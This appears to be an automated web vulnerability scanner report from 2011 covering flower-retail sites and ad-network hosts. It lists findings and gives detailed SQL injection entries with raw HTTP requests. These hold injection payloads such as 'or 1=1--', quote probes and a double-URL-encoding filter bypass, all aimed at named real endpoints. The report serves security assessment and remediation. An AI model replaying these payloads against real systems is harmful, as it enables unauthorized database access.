4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]

4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]

4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]

4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]

4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]

4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]

4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]

4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]

4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]

4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]

4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]

4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]

4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]

4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]

4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]

4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]

4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]

4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]

4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]

4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]

4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]

4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]

4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]

4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.204. http://ww30.1800baskets.com/template.do [ShopperManagerEnterprise cookie]

4.205. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.206. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.207. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.208. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.209. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.210. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.211. https://ww30.1800flowers.com/checkoutsignin.do [ShopperManagerEnterprise cookie]

4.212. https://ww30.1800flowers.com/continueasguest.do [ShopperManagerEnterprise cookie]

5. Flash cross-domain policy

5.1. http://ad.doubleclick.net/crossdomain.xml

5.2. http://ads.undertone.com/crossdomain.xml

5.3. http://adsfac.us/crossdomain.xml

5.4. http://at.amgdgt.com/crossdomain.xml

5.5. http://b.scorecardresearch.com/crossdomain.xml

5.6. http://blooms.1800flowers.com/crossdomain.xml

5.7. http://bp.specificclick.net/crossdomain.xml

5.8. http://data.cmcore.com/crossdomain.xml

5.9. http://ib.adnxs.com/crossdomain.xml

5.10. http://idcs.interclick.com/crossdomain.xml

5.11. http://metrics.ftd.com/crossdomain.xml

5.12. http://pix04.revsci.net/crossdomain.xml

5.13. http://pixel.fetchback.com/crossdomain.xml

5.14. http://pixel.quantserve.com/crossdomain.xml

5.15. http://recs.richrelevance.com/crossdomain.xml

5.16. http://segment-pixel.invitemedia.com/crossdomain.xml

5.17. http://wa.proflowers.com/crossdomain.xml

5.18. http://googleads.g.doubleclick.net/crossdomain.xml

5.19. http://static.ak.fbcdn.net/crossdomain.xml

5.20. http://w.sharethis.com/crossdomain.xml

5.21. http://www.facebook.com/crossdomain.xml

5.22. http://www.ftd.com/crossdomain.xml

5.23. http://www.res-x.com/crossdomain.xml

5.24. http://www.proflowers.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://metrics.ftd.com/clientaccesspolicy.xml

6.4. http://wa.proflowers.com/clientaccesspolicy.xml

7. Cleartext submission of password

8. SSL cookie without secure flag set

8.1. https://accounts.proflowers.com/Default.aspx

8.2. https://ww30.1800flowers.com/checkoutsignin.do

8.3. https://ww30.1800flowers.com/continueasguest.do

8.4. https://accounts.proflowers.com/CustomerLogin.aspx

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://sales.liveperson.net/hc/87011923/

9.3. http://t.p.mybuys.com/webrec/wr.do

10. Password field submitted using GET method

10.1. http://www.ftd.com/

10.2. http://www.ftd.com/

11. Open redirection

11.1. http://ad.trafficmp.com/a/bpix [r parameter]

11.2. http://pix04.revsci.net/K10145/a3/0/3/pg.302 [tgt parameter]

12. Cookie scoped to parent domain

12.1. http://ww30.1800baskets.com/include/cookieCloner.asp

12.2. http://ww30.1800flowers.com/

12.3. http://www.cherrymoonfarms.com/default.aspx

12.4. http://www.personalcreations.com/default.aspx

12.5. http://www.proflowers.com/

12.6. http://www.proflowers.com/house-plants-PBS

12.7. http://www.proflowers.com/mothers-day-flowers-MDF

12.8. http://www.proflowers.com/send-flowers-bsl

12.9. https://accounts.proflowers.com/CustomerLogin.aspx

12.10. https://accounts.proflowers.com/Default.aspx

12.11. http://ad.trafficmp.com/a/bpix

12.12. http://ads.revsci.net/adserver/ako

12.13. http://ads.revsci.net/adserver/ako

12.14. http://ads.revsci.net/adserver/ako

12.15. http://ads.revsci.net/adserver/ako

12.16. http://ads.revsci.net/adserver/ako

12.17. http://ads.revsci.net/adserver/ako

12.18. http://ads.revsci.net/adserver/ako

12.19. http://at.amgdgt.com/ads/

12.20. http://b.scorecardresearch.com/b

12.21. http://ib.adnxs.com/seg

12.22. http://idcs.interclick.com/Segment.aspx

12.23. http://leadback.advertising.com/adcedge/lb

12.24. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

12.25. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.26. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.27. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.28. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.29. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.30. http://pixel.fetchback.com/serve/fb/pdc

12.31. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

12.32. http://pixel.rubiconproject.com/tap.php

12.33. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

12.34. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

12.35. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

12.36. http://segment-pixel.invitemedia.com/pixel

12.37. http://t.p.mybuys.com/webrec/wr.do

12.38. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

12.39. http://www.ftd.com/351

13. Cookie without HttpOnly flag set

13.1. http://blooms.1800flowers.com/cm

13.2. http://t.p.mybuys.com/webrec/wr.do

13.3. http://ww30.1800baskets.com/deliverycalendarnew.do

13.4. http://ww30.1800baskets.com/include/cookieCloner.asp

13.5. http://ww30.1800baskets.com/shoppingbasket.do

13.6. http://ww30.1800baskets.com/template.do

13.7. http://ww30.1800flowers.com/

13.8. http://ww30.1800flowers.com/collection.do

13.9. http://ww30.1800flowers.com/deliverycalendarnew.do

13.10. http://ww30.1800flowers.com/guidedmodel.do

13.11. http://ww30.1800flowers.com/product.do

13.12. http://ww30.1800flowers.com/shoppingbasket.do

13.13. https://ww30.1800flowers.com/checkoutsignin.do

13.14. https://ww30.1800flowers.com/continueasguest.do

13.15. http://www.cherrymoonfarms.com/default.aspx

13.16. http://www.personalcreations.com/default.aspx

13.17. http://www.proflowers.com/

13.18. http://www.proflowers.com/house-plants-PBS

13.19. http://www.proflowers.com/mothers-day-flowers-MDF

13.20. http://www.proflowers.com/send-flowers-bsl

13.21. https://accounts.proflowers.com/CustomerLogin.aspx

13.22. https://accounts.proflowers.com/Default.aspx

13.23. http://ad.trafficmp.com/a/bpix

13.24. http://ad.yieldmanager.com/pixel

13.25. http://ads.revsci.net/adserver/ako

13.26. http://ads.revsci.net/adserver/ako

13.27. http://ads.revsci.net/adserver/ako

13.28. http://ads.revsci.net/adserver/ako

13.29. http://ads.revsci.net/adserver/ako

13.30. http://ads.revsci.net/adserver/ako

13.31. http://ads.revsci.net/adserver/ako

13.32. http://ads.undertone.com/fc.php

13.33. http://at.amgdgt.com/ads/

13.34. http://b.scorecardresearch.com/b

13.35. http://blooms.1800flowers.com/cm

13.36. http://ftd.com/

13.37. http://idcs.interclick.com/Segment.aspx

13.38. http://leadback.advertising.com/adcedge/lb

13.39. http://login.dotomi.com/ucm/UCMController

13.40. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

13.41. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.42. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.43. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.44. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.45. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.46. http://pixel.fetchback.com/serve/fb/pdc

13.47. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

13.48. http://pixel.rubiconproject.com/tap.php

13.49. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

13.50. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

13.51. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

13.52. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.53. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.54. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.55. http://segment-pixel.invitemedia.com/pixel

13.56. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

13.57. http://www.ftd.com/351

14. Password field with autocomplete enabled

14.1. https://accounts.proflowers.com/CustomerLogin.aspx

14.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

14.3. http://ww30.1800baskets.com/product.do

14.4. https://ww30.1800flowers.com/checkoutsignin.do

14.5. http://www.ftd.com/

14.6. http://www.ftd.com/

14.7. http://www.ftd.com/

14.8. http://www.ftd.com/

14.9. http://www.ftd.com/

15. Referer-dependent response

15.1. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

15.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

15.3. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

15.4. http://www.facebook.com/plugins/like.php

16. Cross-domain Referer leakage

16.1. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js

16.2. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js

16.3. https://accounts.proflowers.com/CustomerLogin.aspx

16.4. https://accounts.proflowers.com/Default.aspx

16.5. http://adsfac.us/pct_mx.asp

16.6. http://adsfac.us/pct_mx.asp

16.7. http://adsfac.us/pct_mx.asp

16.8. http://bp.specificclick.net/

16.9. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

16.10. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

16.11. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

16.12. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

16.13. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

16.14. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

16.15. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

16.16. http://pixel.fetchback.com/serve/fb/pdc

16.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

16.18. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

16.19. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

16.20. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

16.21. http://ww30.1800baskets.com/deliverycalendarnew.do

16.22. http://ww30.1800baskets.com/product.do

16.23. http://ww30.1800baskets.com/template.do

16.24. http://ww30.1800flowers.com/collection.do

16.25. http://ww30.1800flowers.com/product.do

16.26. http://www.cherrymoonfarms.com/default.aspx

16.27. http://www.facebook.com/plugins/like.php

16.28. http://www.personalcreations.com/default.aspx

16.29. http://www.proflowers.com/default.aspx

16.30. http://www.proflowers.com/house-plants-PBS

16.31. http://www.proflowers.com/mothers-day-flowers-MDF

16.32. http://www.proflowers.com/send-flowers-bsl

17. Cross-domain script include

17.1. https://accounts.proflowers.com/CustomerLogin.aspx

17.2. https://accounts.proflowers.com/Default.aspx

17.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

17.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

17.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

17.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

17.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

17.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

17.9. http://pixel.fetchback.com/serve/fb/pdc

17.10. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

17.11. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

17.12. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

17.13. http://ww30.1800baskets.com/deliverycalendarnew.do

17.14. http://ww30.1800baskets.com/product.do

17.15. http://ww30.1800baskets.com/shoppingbasket.do

17.16. http://ww30.1800baskets.com/template.do

17.17. http://ww30.1800flowers.com/

17.18. http://ww30.1800flowers.com/collection.do

17.19. http://ww30.1800flowers.com/product.do

17.20. http://ww30.1800flowers.com/shoppingbasket.do

17.21. https://ww30.1800flowers.com/checkoutsignin.do

17.22. https://ww30.1800flowers.com/continueasguest.do

17.23. http://www.cherrymoonfarms.com/default.aspx

17.24. http://www.facebook.com/plugins/like.php

17.25. http://www.ftd.com/

17.26. http://www.personalcreations.com/default.aspx

17.27. http://www.proflowers.com/

17.28. http://www.proflowers.com/default.aspx

17.29. http://www.proflowers.com/house-plants-PBS

17.30. http://www.proflowers.com/mothers-day-flowers-MDF

17.31. http://www.proflowers.com/send-flowers-bsl

18. TRACE method is enabled

18.1. http://att.adpxpx.com/

18.2. http://bp.specificclick.net/

18.3. http://metrics.ftd.com/

18.4. http://pixel.fetchback.com/

18.5. http://pixel.rubiconproject.com/

19. Email addresses disclosed

19.1. http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js

19.2. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css

19.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js

19.4. https://ww30.1800flowers.com/checkoutsignin.do

19.5. http://www.ftd.com/

20. Private IP addresses disclosed

20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.2. http://www.facebook.com/plugins/like.php

20.3. http://www.facebook.com/plugins/like.php

20.4. http://www.facebook.com/plugins/like.php

21. Robots.txt file

21.1. http://ad.doubleclick.net/activity

21.2. http://ads.undertone.com/fc.php

21.3. http://adsfac.us/pct_mx.asp

21.4. http://at.amgdgt.com/ads/

21.5. http://b.scorecardresearch.com/b

21.6. http://blooms.1800flowers.com/cm

21.7. http://data.cmcore.com/cookie-id.js

21.8. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

21.9. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1014041578/

21.10. http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico

21.11. http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css

21.12. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

21.13. http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico

21.14. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

21.15. http://pixel.fetchback.com/serve/fb/pdc

21.16. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

21.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

21.18. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP

21.19. http://safebrowsing.clients.google.com/safebrowsing/gethash

21.20. http://segment-pixel.invitemedia.com/pixel

21.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.22. http://t.p.mybuys.com/webrec/wr.do

21.23. http://toolbarqueries.clients.google.com/tbproxy/af/query

21.24. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

21.25. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

21.26. http://ww30.1800baskets.com/include/cookieCloner.asp

21.27. http://ww30.1800flowers.com/

21.28. https://ww30.1800flowers.com/checkoutsignin.do

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.ftd.com/

21.31. http://www.google-analytics.com/__utm.gif

21.32. http://www.googleadservices.com/pagead/conversion/1014041578/

21.33. http://www.proflowers.com/

21.34. http://www.res-x.com/ws/r2/Resonance.aspx

22. Cacheable HTTPS response

22.1. https://accounts.proflowers.com/CustomerLogin.aspx

22.2. https://accounts.proflowers.com/Default.aspx

22.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

22.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

22.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

22.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

22.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

22.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

23. HTML does not specify charset

23.1. http://a1128.g.akamai.net/favicon.ico

23.2. http://adsfac.us/pct_mx.asp

23.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

23.4. http://recs.richrelevance.com/favicon.ico

23.5. http://www.ftd.com/

23.6. http://www.ftd.com/empty/index.epl

23.7. http://www.ftd.com/empty/tealeaf.epl

24. Content type incorrectly stated

24.1. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

24.2. http://sales.liveperson.net/hcp/html/mTag.js

24.3. http://www.res-x.com/ws/r2/Resonance.aspx

25. SSL certificate

25.1. https://orders.proflowers.com/

25.2. https://ww30.1800flowers.com/



1. SQL injection
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /rrserver'/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1036

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver''/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Connection: keep-alive
Content-Length: 0


1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /rrserver%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:07 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1048

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver%2527%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:08 GMT
Connection: keep-alive
Content-Length: 0


1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /deliverycalendarnew.do

Issue detail

The month parameter appears to be vulnerable to SQL injection attacks. The payloads 12903751%20or%201%3d1--%20 and 12903751%20or%201%3d2--%20 were each submitted in the month parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /deliverycalendarnew.do?month=512903751%20or%201%3d1--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
